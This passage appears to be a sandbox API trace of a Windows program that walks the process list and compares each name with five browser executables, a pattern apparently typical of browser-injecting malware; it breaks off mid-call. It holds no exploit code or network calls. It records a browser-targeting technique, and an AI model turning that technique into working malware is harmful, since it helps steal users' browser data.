lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.445] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.445] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.445] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.445] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.445] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.445] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0213.445] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0213.445] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0213.445] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0213.445] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.446] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.447] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.447] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.447] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.447] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0213.447] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0213.447] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0213.447] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0213.447] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.448] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0213.448] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0213.448] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0213.448] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0213.448] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.448] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0213.448] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0213.448] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0213.448] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0213.448] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.449] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.449] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.449] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.449] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.449] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.449] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0213.450] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0213.450] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0213.450] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0213.450] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0213.450] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0213.450] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0213.450] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0213.450] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0213.450] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0213.451] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0213.451] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0213.451] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0213.451] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0213.451] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.451] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0213.451] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0213.451] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0213.451] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0213.451] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0213.451] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.451] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0213.452] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0213.452] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0213.452] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0213.452] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0213.452] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.452] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0213.452] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0213.452] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0213.452] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0213.453] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0213.453] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.453] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0213.453] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0213.453] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0213.453] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0213.453] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0213.453] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.453] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0213.454] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0213.454] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0213.454] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0213.454] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0213.454] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0213.454] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0213.454] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0213.454] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0213.454] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0213.454] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0213.455] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0213.455] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0213.455] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0213.455] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0213.455] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.455] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0213.456] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0213.456] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0213.456] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0213.456] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0213.456] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0213.456] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0213.456] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0213.456] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0213.456] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0213.456] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0213.457] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0213.457] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0213.457] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0213.457] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0213.457] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0213.457] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0213.457] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0213.457] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0213.457] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0213.457] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0213.458] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0213.458] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0213.458] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0213.458] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0213.458] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.458] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0213.459] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0213.459] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0213.459] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0213.459] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0213.459] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.459] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0213.459] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0213.459] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0213.459] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0213.459] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0213.459] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.459] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0213.460] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0213.460] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0213.460] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0213.460] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0213.460] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.460] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0213.460] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0213.460] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0213.460] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0213.460] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0213.460] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.460] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0213.461] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0213.461] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0213.461] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0213.461] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0213.461] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.461] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0213.462] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0213.462] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0213.462] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0213.462] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0213.462] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0213.462] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0213.462] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0213.462] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0213.462] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0213.462] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0213.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0213.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0213.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0213.463] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.463] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.463] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.463] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.463] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.463] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.464] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0213.464] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0213.464] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0213.464] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0213.464] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.538] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.538] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.538] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.538] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.538] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0213.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0213.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0213.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0213.538] lstrcmpiA (lpString1="taskhost.exe", 